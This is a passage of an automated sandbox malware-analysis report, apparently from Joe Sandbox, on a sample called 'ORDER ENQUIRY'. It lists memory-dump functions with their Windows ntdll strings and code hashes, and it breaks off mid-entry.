Opcode ID: 1b6a48db48aab8b8e2624d8b0c3cdee1ff43c005b1f5bce98402371df8edd4a4
Instruction ID: a33b867d0d027ae165365d7acebc91489b948e86febfadba0cb2c64a371fd8c8
Opcode Fuzzy Hash: 1b6a48db48aab8b8e2624d8b0c3cdee1ff43c005b1f5bce98402371df8edd4a4
Instruction Fuzzy Hash: 6241F3B1984311BBC720EB68DD45B9B7BE8FF54760F49492AF949D3254E770D800CB91

Function 01B6C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 01B6C1F1
PreferredUILanguages, xrefs: 01B6C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B6C1C5

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 52695df924a7838dc2bff9203519b85092cacdd056a6be6cde2f59621f5153b9
Instruction ID: 67df4ed1db98b4cfddfbe3505c782b7ead59e9f34df87647c0a3a765782cfce7
Opcode Fuzzy Hash: 52695df924a7838dc2bff9203519b85092cacdd056a6be6cde2f59621f5153b9
Instruction Fuzzy Hash: 75415271E0020AEBDF15DED8C951FEEBBBCEB24704F1441AAEA49B7250D7789A44CB50

Function 01B44144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01B44225
LdrpResValidateFilePath Exit, xrefs: 01B44172
LdrpResValidateFilePath Enter, xrefs: 01B44160

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 9f22f129c211fb31b4caaf4cd10303c562f8394fc29f300bf9d6b99db3f48023
Instruction ID: 44e27734749fe6e7cfbac87a7a915515b53a6244fd90190f0a43c8759b9c6237
Opcode Fuzzy Hash: 9f22f129c211fb31b4caaf4cd10303c562f8394fc29f300bf9d6b99db3f48023
Instruction Fuzzy Hash: 71414371A106888BEB2ADFE9C940BADBBB8FF55740F14849AD901FB381DB349900CB10

Function 01B34755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 01B3488F
minkernel\ntdll\ldrredirect.c, xrefs: 01B34899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B34888

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: b3575554843e572dd4922ca74fa334ba032654a01649ad71cdac046e6cec0c22
Instruction ID: 1af5537f88b7af45a9fd95d13233037048e90c9377a357aedc1a46d748584418
Opcode Fuzzy Hash: b3575554843e572dd4922ca74fa334ba032654a01649ad71cdac046e6cec0c22
Instruction Fuzzy Hash: C541AF32A15651DFCB2ACE6DD840A26BBE4FFC9B50B0506E9ED5897351E730E820CB91

Function 01AC0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01B15431
HEAP: , xrefs: 01B1543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01B15449

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: e6285182c403464b77eefeea2cd7bf183c5d7e1576d5a85f3616227ca7ddd7b9
Instruction ID: 77dbeb7ace8c865e2f090ed483a845c6b1366af18daee18e662520415b3d71a4
Opcode Fuzzy Hash: e6285182c403464b77eefeea2cd7bf183c5d7e1576d5a85f3616227ca7ddd7b9
Instruction Fuzzy Hash: 2A11DC35394142DFDB2DDB28C551B6AB3A4EF82A16FA981ADF406CF259DB30E880C750

Function 01B320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01B32104
LdrpInitializationFailure, xrefs: 01B320FA
Process initialization failed with status 0x%08lx, xrefs: 01B320F3

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 90ad50d0c5b30be6b46d8ab6db99210b7bd73be6a5a0bb2058bb8203aa5af7fd
Instruction ID: 85690d33586001df9651dcf7d51095d221f990d78205609d844d87a294657cda
Opcode Fuzzy Hash: 90ad50d0c5b30be6b46d8ab6db99210b7bd73be6a5a0bb2058bb8203aa5af7fd
Instruction Fuzzy Hash: BAF0FC35640308BBEB28E64DCD43F9A7BA8FB80B54F5400D9F7047B285D3B0A550C691

Function 01AC03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B14D8A

Strings

#%u, xrefs: 01B14D82

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 60f3d2b382652e67c4582602607822ee9eeddab04fce53395264b22eb2cdb167
Instruction ID: 6aee56ad6db044095abc5a92833da0f6f332cbc69b65c7417cef53b738e35f23
Opcode Fuzzy Hash: 60f3d2b382652e67c4582602607822ee9eeddab04fce53395264b22eb2cdb167
Instruction Fuzzy Hash: 02714771A0014A9FDF05DFA8CA90BAEBBF8FF18704F154069E905E7251EB34AD05CBA0

Function 01ABA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 01ABAA25
LdrResSearchResource Enter, xrefs: 01ABAA13

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a2ab6282b4ee6890db503eb9da958e753d4d81d9e579203888e7135e98144e63
Instruction ID: 1f034896effe8e5120cd10680803ca6408d6a87cf3c97c935035428e0dcfc68a
Opcode Fuzzy Hash: a2ab6282b4ee6890db503eb9da958e753d4d81d9e579203888e7135e98144e63
Instruction Fuzzy Hash: 79E19171E00249AFEF26DF99C980BEEBBB9FF08310F1545A9E911E7256E7349940CB50

Function 01B7A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01B7A44B
`, xrefs: 01B7A551

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 6e97508afdc57923ed04c18b26f710728aeaa9e395e5eaa5a94c387096fa0614
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 52C1BD312043429BEB69CF28C845B6FBBE5EFC4718F084A6DF6A68B290D775D505CB81

Function 01B2E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 01B2E751
Legacy, xrefs: 01B2E75A

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 3e155582bcc82b99fb391b728056ae5fd05f5660059737f860d8ccd03ada295f
Instruction ID: 7663a6fa4c8756ff029f93d75ae1c8d2d8adb8833dcc32cdada91cf447697aa4
Opcode Fuzzy Hash: 3e155582bcc82b99fb391b728056ae5fd05f5660059737f860d8ccd03ada295f
Instruction Fuzzy Hash: E5617E71E003199FDB18DFAAC940BAEBBB5FB48700F1441ADE649EB291D771E944CB50

Function 01B543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01B54525
@, xrefs: 01B54437

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 5030f01582da94b561c7470759abda80f2ccf24b789a07810a3b60ec0acb1a8f
Instruction ID: 056efa094ad1aaff0c5585a69b5f50a8e42ebe024357b501e6cb34c2043a0a7c
Opcode Fuzzy Hash: 5030f01582da94b561c7470759abda80f2ccf24b789a07810a3b60ec0acb1a8f
Instruction Fuzzy Hash: 43512771E0021DAEDF15DFE9DD84BEEBBB8EB44754F10056AEA11B7280E7309945CB60

Function 01AB04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AB063D
kLsE, xrefs: 01AB0540

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 81328cf1f0553a173f0e1250d57b4f2f1038dad0710185c67c7130aa610540d4
Instruction ID: 4a71bdf217870fc0baf8fca9b66f44e8912117a29600ea5009009893c2fa7047
Opcode Fuzzy Hash: 81328cf1f0553a173f0e1250d57b4f2f1038dad0710185c67c7130aa610540d4
Instruction Fuzzy Hash: A0519D715047829BD724EF78C6806E7BBF8AF84304F14893EF69A87642E770E545CB91

Function 01ABA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 01ABA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 01ABA309

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: acc792594d0aa02195cc2ba32a06e77cda9c261de1f587ba0e7bee7e8834caa3
Instruction ID: fb7ea574f9c737fa09a87f272252c4be9d436976c0fae23342fe50ea42e75579
Opcode Fuzzy Hash: acc792594d0aa02195cc2ba32a06e77cda9c261de1f587ba0e7bee7e8834caa3
Instruction Fuzzy Hash: 9841D234A05689DBDB15DF5DC480BAE7BB8FF84700F2580E9E905DB296E375D900CB50

Function 01AEA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 01AEA5E9
Cleanup Group, xrefs: 01AEA5E4

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: f178a53c8508b6396849ce7e6a3b94076d69dda2c4e7c207b0c04e25b6e263bc
Instruction ID: 6121b32a477be357b93c3e5d798290aa0d66ee298b6ef4751f2491e841b02099
Opcode Fuzzy Hash: f178a53c8508b6396849ce7e6a3b94076d69dda2c4e7c207b0c04e25b6e263bc
Instruction Fuzzy Hash: 5401A9B2640700AFD321DF28CE4AB2677E8F785B25F058979F658C7190E334E804CB46

Function 01ABC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01ABC8C3, 01ABCA40

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f921c04a401cc5712fcb9e7b91a5590e75aaa07f9f6bb08e7e8d1ec0211b2867
Instruction ID: 853f456953d74053db2618e5837c3caaf7e14686ec99ca19febfba5ea623c67b
Opcode Fuzzy Hash: f921c04a401cc5712fcb9e7b91a5590e75aaa07f9f6bb08e7e8d1ec0211b2867
Instruction Fuzzy Hash: 63828D75E002988FEB25CFA9C9C0BEDBBB9BF44324F148169E919AB356D7309D41CB50

Function 01B36420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01B365C1

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7ece775d15b298878a19b9c4d69e59f355edc4056cee0a0beee78dd6d7888899
Instruction ID: 290f105b2dd9f4d5980355d700ae51992a7037ca2bdcee7a3d247893205ec476
Opcode Fuzzy Hash: 7ece775d15b298878a19b9c4d69e59f355edc4056cee0a0beee78dd6d7888899
Instruction Fuzzy Hash: F19181B1A00619BFEB25DB94CD85FEE7BB8EF58B50F114065F601AB190D774AD04CBA0

Function 01B5E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01B5E1FA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b03ab8b7c5d60be968e526fda11a0f6820a25845f858e80086907414e8c00075
Instruction ID: d3b7c1d3ccba0d3791ed275e13c7d89bc1a9e26203e6462c6c8f8da0dedaf25d
Opcode Fuzzy Hash: b03ab8b7c5d60be968e526fda11a0f6820a25845f858e80086907414e8c00075
Instruction Fuzzy Hash: E091BE32900609AFDF2AABA5DD84FAFBBB9EF45780F000069F905A7251DB35DA01CB50

Function 01AEA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01B267C9

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 504621e23c56135cf3f02c1610eb4bb4d4ee1317873551e531f762a6467d2213
Instruction ID: cf355e40838f92b6b5725c4eac228a9e2ba2c0c6e9663231c863dae8c0ea4e74
Opcode Fuzzy Hash: 504621e23c56135cf3f02c1610eb4bb4d4ee1317873551e531f762a6467d2213
Instruction Fuzzy Hash: 24718EB5E0022ACFDF28CF9CD5806ADBBB1FF58700F1481AAED09AB251E7719845CB50

Function 01B54978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01B54A7F

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: aaf5c5ec8ecf414237bf31c14109aada8171188eedce0b8f459fe8f23da7cd4f
Instruction ID: 1cfb9b86cb72b7793fcc9fbd9cc84732af81385c3d0d81397c21a0048c43ebfc
Opcode Fuzzy Hash: aaf5c5ec8ecf414237bf31c14109aada8171188eedce0b8f459fe8f23da7cd4f
Instruction Fuzzy Hash: F0519472D0022A9BDF99DFA9D940BEEBBB4EF05B10F054169EE11B7240E7349841CBE4

Function 01ACE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 01ACE6A4

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 82645b022126ec4c2c07a796354f2828102e058c52f91035212864d173748381
Instruction ID: 7c5ba8011cfc51f20db51e287807b0cb4968f257a4eeed152e32e26045a57afd
Opcode Fuzzy Hash: 82645b022126ec4c2c07a796354f2828102e058c52f91035212864d173748381
Instruction Fuzzy Hash: 7C418272608342AFD721DB75C940B6FBBE8AF88B14F44092DFA84E7140EB74D908C796

Function 01B2C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 01B2C77F

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 7b96f5b0dba8ed624fadc4321c0916d5533e8b9a336c8eb214d924bf9de7a443
Instruction ID: dd671d8eaed712fc8b1ce34c2f3bedfec897ea831a58fdf2fc16195dcb8fa81f
Opcode Fuzzy Hash: 7b96f5b0dba8ed624fadc4321c0916d5533e8b9a336c8eb214d924bf9de7a443
Instruction Fuzzy Hash: 8B4146B1D0052DAADF25DA50DD84FEEBB7CAB44714F0085D5E708AB140DB709E498F95

Function 01B46B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01B46B91

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 89371650078041977960dda71e4157f19dd4a1b8d4f3b5ac71676da5797b444c
Instruction ID: bb1f511f699b0714348da175f92851e8826c9309b6b4365bd780e5922e0682a3
Opcode Fuzzy Hash: 89371650078041977960dda71e4157f19dd4a1b8d4f3b5ac71676da5797b444c
Instruction Fuzzy Hash: B5311631E007199BEB26CF69C850BAE7BA8DF06704F1480A8E941AB282D775EC45DB54

Function 01B2CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 01B2CAA2

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 1ffeae8ea3efd022c31a88d5030e6295cb404496f96d540a329ca9b048c3b7a4
Instruction ID: c618241d8e903851952b8f8d22ed2a2e747ce406d1053d1f4d0685846912b770
Opcode Fuzzy Hash: 1ffeae8ea3efd022c31a88d5030e6295cb404496f96d540a329ca9b048c3b7a4
Instruction Fuzzy Hash: EE310536900529AFEB19DA58C959E6FBF74EF80760F0141A9EA09E7250D7309E08DBE0

Function 01B3892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B3895E

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: a15f5d61a7fc24d3f5f53a5d46a763df804da64a565215944c337c664187e250
Instruction ID: f1878b856043eebcb4b664f5622951dc707c6d323c72e09293f1fcb338c88c71
Opcode Fuzzy Hash: a15f5d61a7fc24d3f5f53a5d46a763df804da64a565215944c337c664187e250
Instruction Fuzzy Hash: B9012632204305AFEB3D6F5ADDC4AAA7B75EFC5254B4423ACF64217152CB20B8A1C793

Function 01B52000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d964e084fc78d7a6b7423f6a74648e87f844abbdaf6438b4b8893264f1438282
Instruction ID: 2bde5f75e46be9f144ffba8a8e598cfe2f54146bbd38049a7424cf75cc12c2ec
Opcode Fuzzy Hash: d964e084fc78d7a6b7423f6a74648e87f844abbdaf6438b4b8893264f1438282
Instruction Fuzzy Hash: 3042C335609341DBEB69CF68C890B6BBBE5EF88340F0809ADFE9297250D771D845CB52

Function 01B48158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb837132734269a79cbab6135eec80fd9cace0513b720b5ec5615a08df2763bb
Instruction ID: b220dc440b9acd48fcaeab0eb7d8497c61cb083067492fc0a8df9dd504f5807d
Opcode Fuzzy Hash: cb837132734269a79cbab6135eec80fd9cace0513b720b5ec5615a08df2763bb
Instruction Fuzzy Hash: 05422A75A002199FEB29CFA9C881BADBBF5FF48300F14C199E949EB242D7349985DF50

Function 01AC2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565ad6ed84de7ac451105e03012f906c4fe2bf8f53b6d62724662a1b188fca30
Instruction ID: a1f648c391972b698cd9eb9ad63a8909b60e136139187eb738c34091d1cd9c42
Opcode Fuzzy Hash: 565ad6ed84de7ac451105e03012f906c4fe2bf8f53b6d62724662a1b188fca30
Instruction Fuzzy Hash: FA321270A007558FEB29CF69C8447BEBBF2FF84700F55419EE8469B289D7B5A801CB50

Function 01B5A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6f50d74e6cadfb6eb1c5ad302456060041027c02f3ce444eb6e356c067ea3e
Instruction ID: 7d1c06dffc3d01d318092a2d5351021022e4c462dee035a3dc9d7490caffaaa5
Opcode Fuzzy Hash: 9f6f50d74e6cadfb6eb1c5ad302456060041027c02f3ce444eb6e356c067ea3e
Instruction Fuzzy Hash: 6222B0702046518BEBA9CF39C091772BBF1EF45344F0886D9EE96AF286D375E452CB60

Function 01AD4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 11557015e8c2604c8554c806c84da42bcc2d1849ecd48ac6519a1f0f8def48a1
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 04F19F70E0060A9BDF19CFA9C580BAEBBF5FF48710F498169E942AB754E734D841CB60

Function 01B4892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5596878e7f22e244c4bf0ef896826d8a5c74c57c23d0d39c6b99d598af7003da
Instruction ID: eb0ec88331f2e33e0c5eed31533986e04096767d9d49fc660e6811260cfff4c7
Opcode Fuzzy Hash: 5596878e7f22e244c4bf0ef896826d8a5c74c57c23d0d39c6b99d598af7003da
Instruction Fuzzy Hash: 5CD1F071A0060A9FDF09CFA9C881AFEB7F1EF88304F18C1A9D955E7241E735E9059B60

Function 01AB65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d7cc1fd82a648bbdea5b747c7dc00896bd94ea021ba1cc334d43f15d4739f88
Instruction ID: 3e20e5671959919ec5eb80eeb46f91e709024585cf942bf8c0bb08cfb0a32252
Opcode Fuzzy Hash: 5d7cc1fd82a648bbdea5b747c7dc00896bd94ea021ba1cc334d43f15d4739f88
Instruction Fuzzy Hash: 1BE16D71508382CFC715CF28C5D0AAABBE4FF89314F05896DE99987352EB31E945CB92

Function 01AA8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d1ad296397b945185ac4e09dd1b08436dbbe935c5c12d9dd9ed41d15843f99
Instruction ID: 7167a8176f0cfcca0a2e63c0427e765804ddfe719239bbb9d36daf00e0f09d1a
Opcode Fuzzy Hash: 63d1ad296397b945185ac4e09dd1b08436dbbe935c5c12d9dd9ed41d15843f99
Instruction Fuzzy Hash: C8D10171A002069BDB19CF68C980EBABBB5FF54305F48426DF912DB2C1EB38E950CB50

Function 01B38243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 7b4e401705bb4c5dab21db36131815b0b4596489492c10b8344955b51db1e4ee
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
